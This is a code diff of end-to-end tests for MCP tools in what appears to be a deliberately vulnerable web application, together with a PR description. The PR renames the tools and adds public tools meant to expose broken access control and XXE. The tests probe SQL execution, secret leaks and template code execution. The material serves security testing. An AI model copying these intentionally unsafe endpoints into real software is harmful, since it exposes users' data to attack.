+            'Mcp-Session-Id': mcpSession.sessionId
+          }
+        );
+
+        expect(response.status).toBe(200);
+        expect(response.data?.error).toBeUndefined();
+        expect(response.data?.result?.content?.[0]?.text).toContain(
+          '<username>John</username>'
+        );
+      });
+    });
+
+    describe('search_users', () => {
+      it('should proxy /api/users/search/:name and return JSON text payload', async () => {
+        const mcpSession = await initializeMcpSession();
+        const response = await postMcp(
+          {
+            jsonrpc: '2.0',
+            method: 'tools/call',
+            params: {
+              name: 'search_users',
+              arguments: {
+                name: 'a'
+              }
+            },
+            id: 12
+          },
+          {
+            'Mcp-Session-Id': mcpSession.sessionId
+          }
+        );
+
+        expect(response.status).toBe(200);
+        expect(response.data?.error).toBeUndefined();
+
+        const jsonText = response.data?.result?.content?.[0]?.text;
+        expect(typeof jsonText).toBe('string');
+
+        const parsed = JSON.parse(jsonText) as unknown;
+        expect(Array.isArray(parsed)).toBe(true);
       });
     });
 
@@ -554,8 +613,8 @@ describe('/api', () => {
 
     afterEach(() => runner.clear());
 
-    describe('count_tool', () => {
-      it('should not execute commands for SQL database via MCP count_tool', async () => {
+    describe('get_count', () => {
+      it('should not execute commands for SQL database via MCP get_count', async () => {
         const mcpSession = await initializeMcpSession();
 
         await runner
@@ -574,7 +633,7 @@ describe('/api', () => {
               jsonrpc: '2.0',
               method: 'tools/call',
               params: {
-                name: 'count_tool',
+                name: 'get_count',
                 arguments: {
                   query: 'select count(*) as count from testimonial'
                 }
@@ -586,8 +645,8 @@ describe('/api', () => {
       });
     });
 
-    describe('config_tool', () => {
-      it('should not contain secret tokens leak via MCP config_tool', async () => {
+    describe('get_config', () => {
+      it('should not contain secret tokens leak via MCP get_config', async () => {
         const token = await loginForMcp('admin', 'admin');
         const mcpSession = await initializeMcpSession(token);
 
@@ -607,7 +666,7 @@ describe('/api', () => {
               jsonrpc: '2.0',
               method: 'tools/call',
               params: {
-                name: 'config_tool',
+                name: 'get_config',
                 arguments: {}
               },
               id: 1
@@ -617,8 +676,8 @@ describe('/api', () => {
       });
     });
 
-    describe('render_tool', () => {
-      it('should not contain possibility to server-side code execution via MCP render_tool', async () => {
+    describe('render', () => {
+      it('should not contain possibility to server-side code execution via MCP render', async () => {
         const mcpSession = await initializeMcpSession();
 
         await runner
@@ -637,7 +696,7 @@ describe('/api', () => {
               jsonrpc: '2.0',
               method: 'tools/call',
               params: {
-                name: 'render_tool',
+                name: 'render',
                 arguments: {
                   numbers: [1, 2, 3],
                   template: 'Result: {{=it.sum}}'


### PR DESCRIPTION
- Standardized MCP tool names to clearer IDs: `get_count`, `get_config`, `spawn_process`, and `get_metadata` (replacing the older names used in MCP).
- Added a new public MCP tool for BAC: `search_users`, which proxies `GET /api/users/search/:name` and returns JSON results.
- Added a new public MCP tool for XXE: `get_metadata`, which proxies `POST /api/metadata` and returns JSON results.
- Updated `README.md`MCP sections with the new tool names and added `search_users` and `get_metadata` usage/examples.
- Updated `mcp.e2e-spec.ts` to use renamed tools and added coverage for `search_users`  and `get_metadata`.